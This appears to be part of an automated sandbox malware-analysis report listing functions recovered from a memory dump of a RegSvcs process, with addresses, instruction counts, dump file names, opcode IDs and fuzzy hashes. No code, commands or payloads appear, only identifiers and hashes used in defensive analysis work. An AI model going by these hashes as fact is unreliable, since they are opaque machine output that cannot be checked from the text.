                                                                                            • Instruction ID: ab7350310fd2f2bde64bad6188dcd93f74f379de42d083635b359e9bd97b8268
                                                                                            • Opcode Fuzzy Hash: 13a93e74c67512b65e636575e3bba9834875976f309a0480c4044afe31c86b28
                                                                                            • Instruction Fuzzy Hash: 364166B1A40701EFD320DF18C841B66B7E5EF48724F24C56AE4498B252EB79E942DB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA0710 Relevance: .1, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                            • Instruction ID: 83441fad8301e558cb8b4c71d70764f5db6c21330c5d772e4811eb36dc9872a8
                                                                                            • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                            • Instruction Fuzzy Hash: 814138B1A00605EFCB24CF99D980AAAB7F4FF09710B20496DE556D7291DB30FA44EF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F7A2C3 Relevance: .1, Instructions: 118COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 13b0a32d091f97a116ddbbb1ce93ef429a07876f601c5e13c22d12594a397701
                                                                                            • Instruction ID: 2d4ad65f8419ea6a42ba1bffb8d40d707267eda6ad7757e49c2dbf3e78ce7374
                                                                                            • Opcode Fuzzy Hash: 13b0a32d091f97a116ddbbb1ce93ef429a07876f601c5e13c22d12594a397701
                                                                                            • Instruction Fuzzy Hash: 9241BD31A04649CBDB51DF59C840B6E77B5EF94710F2980A7E808DB3A1E376D900EB82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAC8F9 Relevance: .1, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5c9f7c215ab895139599f7e4fcb604c5190ff43410204b85942cf6d0d2bf03e0
                                                                                            • Instruction ID: ae7d7d9445dce7f1309c62fa4a859182cd6c02fd02d4891f4f6c63099586c6b3
                                                                                            • Opcode Fuzzy Hash: 5c9f7c215ab895139599f7e4fcb604c5190ff43410204b85942cf6d0d2bf03e0
                                                                                            • Instruction Fuzzy Hash: B3318DB2A01349DFDB51DF58C541799BBF0FB09724F2081AEE019DB251D7369902DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F680A0 Relevance: .1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c7d41e75cefc9fdfb382df03cfb5f3d13421cc93f63ef734b26b6b61d78125b0
                                                                                            • Instruction ID: df40db4de9693de80cc164cdd805ab499a494f20a49e77e4234c1dfb647c6171
                                                                                            • Opcode Fuzzy Hash: c7d41e75cefc9fdfb382df03cfb5f3d13421cc93f63ef734b26b6b61d78125b0
                                                                                            • Instruction Fuzzy Hash: 8841C372E056159FCB10DF18CD41AA8B7B1BF457A0F24872EE815A7281DF34ED43AB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF05A7 Relevance: .1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3e96da3bc0c321958b14c5c7899de14ca136e4c7385b76d84f90db98b19598d4
                                                                                            • Instruction ID: f815b20a20ffa65d000811b8aaa3eb14d6319398320f8526da51707406757fc6
                                                                                            • Opcode Fuzzy Hash: 3e96da3bc0c321958b14c5c7899de14ca136e4c7385b76d84f90db98b19598d4
                                                                                            • Instruction Fuzzy Hash: E141C272A046459FC320EF68C841ABAB7E5AFC8710F040629F994D76A2EB34ED14D7A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA2674 Relevance: .1, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: adf3d785aba6c29f088d97cf3e0587e2f20aaaa7eaeb1ce585a784bf2ee120cb
                                                                                            • Instruction ID: 57ea711caae04f87dde4bbb9011aab141052f9a40ac01c2e0c883e5990b23ad2
                                                                                            • Opcode Fuzzy Hash: adf3d785aba6c29f088d97cf3e0587e2f20aaaa7eaeb1ce585a784bf2ee120cb
                                                                                            • Instruction Fuzzy Hash: E9312472F00364B7E7209E9A8C86F6A7668DF56B51F150069FB04A7281E274DF00F3A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F802E1 Relevance: .1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                            • Instruction ID: fe8ba300f4cd3497945faefcd38bccbfb5515fc4cd33b6bc09691d60518f30c5
                                                                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                            • Instruction Fuzzy Hash: 70314A32A01244AFDB519B68CC40BDEBBE9EF04350F0481B6F455D7352C678D848EBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0101E3DB Relevance: .1, Instructions: 105COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eb6ceb906efce772a88cd0181659beb9f6762c3f7119aaa6cf43ada3745406fe
                                                                                            • Instruction ID: 2c9a807b15bc5801042d076626a1dbb33fa4a8dce938fc5d586f6cf4a53c049f
                                                                                            • Opcode Fuzzy Hash: eb6ceb906efce772a88cd0181659beb9f6762c3f7119aaa6cf43ada3745406fe
                                                                                            • Instruction Fuzzy Hash: 1331C875780705ABE723AF55CC41FAF7AA4AB49B50F100028FA00AB292CEADDD00D7A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01024B4B Relevance: .1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1cd294e2d00812bdfc108a1ff53613b820b5b943f988021d7b41aab91463bb57
                                                                                            • Instruction ID: 23182b982c9e4885f57f5c370517f8a668b3a09578551d588837c62fad217805
                                                                                            • Opcode Fuzzy Hash: 1cd294e2d00812bdfc108a1ff53613b820b5b943f988021d7b41aab91463bb57
                                                                                            • Instruction Fuzzy Hash: DB31F4726056208FC362DF1DD880E6AB7E5FB80360F1A44ADF9D5DB665D732E800CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F74260 Relevance: .1, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a65d50a8b106302970d96a9fc40f679e98b8a29fd91073116ec5072549d59b04
                                                                                            • Instruction ID: b1f2efe8158313901a0ca3ac20fdd5077961bb3da3703bfa2b2e3bad5c61f060
                                                                                            • Opcode Fuzzy Hash: a65d50a8b106302970d96a9fc40f679e98b8a29fd91073116ec5072549d59b04
                                                                                            • Instruction Fuzzy Hash: 1441EE72601B04DFC722CF28C885FD67BEABF49710F14842AE9998B351CB74E840EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01024BB0 Relevance: .1, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 384b44f94b9e1fd96a6ba97dc214753b2086b64a82dc9af6d7976f230059bf1b
                                                                                            • Instruction ID: 54783fe8a688f3a9abf28a6211209c7335e8aa9337a812729d730a266230524b
                                                                                            • Opcode Fuzzy Hash: 384b44f94b9e1fd96a6ba97dc214753b2086b64a82dc9af6d7976f230059bf1b
                                                                                            • Instruction Fuzzy Hash: F131CB716042158FD360EF2CC880A6AB7E5FB84720F1A49ADF999DB391E730EC04CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010361C3 Relevance: .1, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1fe3362a4f6cd83d8a14e0cd035c448af29ec82d940cfa2708ecd871a86a00ad
                                                                                            • Instruction ID: e0d9a2eedf56c12ab5bbb236b2ffaa8562b09b9e5a6f53dfec829a517cd5287e
                                                                                            • Opcode Fuzzy Hash: 1fe3362a4f6cd83d8a14e0cd035c448af29ec82d940cfa2708ecd871a86a00ad
                                                                                            • Instruction Fuzzy Hash: F631E175A00619BBDB15DF98CC41FAEB7B9EB84B40F464168F940EB245D7B1EE00CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0101483A Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9fe0533045ee71f5ea4d9082e3c107d9db9cefa7d2b7073caebb2161cddb9dd
                                                                                            • Instruction ID: 9a4c50be27eaa87ba2e1f54716c7d58a74e74f174eb4cb6c4b8018f7d19ce0a0
                                                                                            • Opcode Fuzzy Hash: c9fe0533045ee71f5ea4d9082e3c107d9db9cefa7d2b7073caebb2161cddb9dd
                                                                                            • Instruction Fuzzy Hash: DC317376A4012CABCB61DF54DC84BDE7BF6AB98350F1000E5B548E7261CB349E919F90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010360B8 Relevance: .1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b7fc46f43b2b514da24fe45b3302b8206c5df575b7cb9c3ee9927a8f4d5c4b9f
                                                                                            • Instruction ID: f5500d455f12a32712ecab167c519f31303aac1452b73322c9ec47b97644fcff
                                                                                            • Opcode Fuzzy Hash: b7fc46f43b2b514da24fe45b3302b8206c5df575b7cb9c3ee9927a8f4d5c4b9f
                                                                                            • Instruction Fuzzy Hash: B431F471600611BBDB22AF99CC51BAEB7FDAF84750F044069F585EB352DB32EE008B90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F707AF Relevance: .1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 104a7ccfc40f643cbbe9e8113b8031d6a4d6bfd4a553fa0dba7e6eb259b88f96
                                                                                            • Instruction ID: 342dc1b1be26f72de47ada73e700602cec6ddfeb6bf59d811fa868028f92e0db
                                                                                            • Opcode Fuzzy Hash: 104a7ccfc40f643cbbe9e8113b8031d6a4d6bfd4a553fa0dba7e6eb259b88f96
                                                                                            • Instruction Fuzzy Hash: 4031F172A04312DBC711DE64C880E6BB7A5AF94360F01842AFC59A7351DE34DC01B7E3
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F76484 Relevance: .1, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8090ad96216529aa4fa8e04bbf129b5965c73426f5fb932924aec8b12a87af76
                                                                                            • Instruction ID: 3b344ddd80d44bc7590697b05b0f963d139adb78723697ae205089f613562c69
                                                                                            • Opcode Fuzzy Hash: 8090ad96216529aa4fa8e04bbf129b5965c73426f5fb932924aec8b12a87af76
                                                                                            • Instruction Fuzzy Hash: 3F31C572A007858FD731CB14C581BA277A5EF05B60F198576E88C8B646CB29D845FB82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F78550 Relevance: .1, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 060e71eb9e116f6f9b33b853bab23b98e556bf40cc178e5f1340f928bab422c7
                                                                                            • Instruction ID: 9ebc0f7b927b70862100e4d693e645a16afbc54713ce90b332aa836f77d41aca
                                                                                            • Opcode Fuzzy Hash: 060e71eb9e116f6f9b33b853bab23b98e556bf40cc178e5f1340f928bab422c7
                                                                                            • Instruction Fuzzy Hash: D0319E72A093018FD360CF19C844B1ABBE5FF98760F19896EE88897351D771EC44EB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FECA72 Relevance: .1, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7d3624a3dc7e4534a2d8a0958e8f1a504e81e6abd966e6c7b7d41f510fe64146
                                                                                            • Instruction ID: 0d19771285bea4c2446ce4f5bad973e704215ac48d55d3e03b01264be52e383a
                                                                                            • Opcode Fuzzy Hash: 7d3624a3dc7e4534a2d8a0958e8f1a504e81e6abd966e6c7b7d41f510fe64146
                                                                                            • Instruction Fuzzy Hash: 56310336D00559AFDB15DA5AC852EAFB774EBC0B20F114129F811AB291D7309E06EBE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAA6C7 Relevance: .1, Instructions: 92COMMON
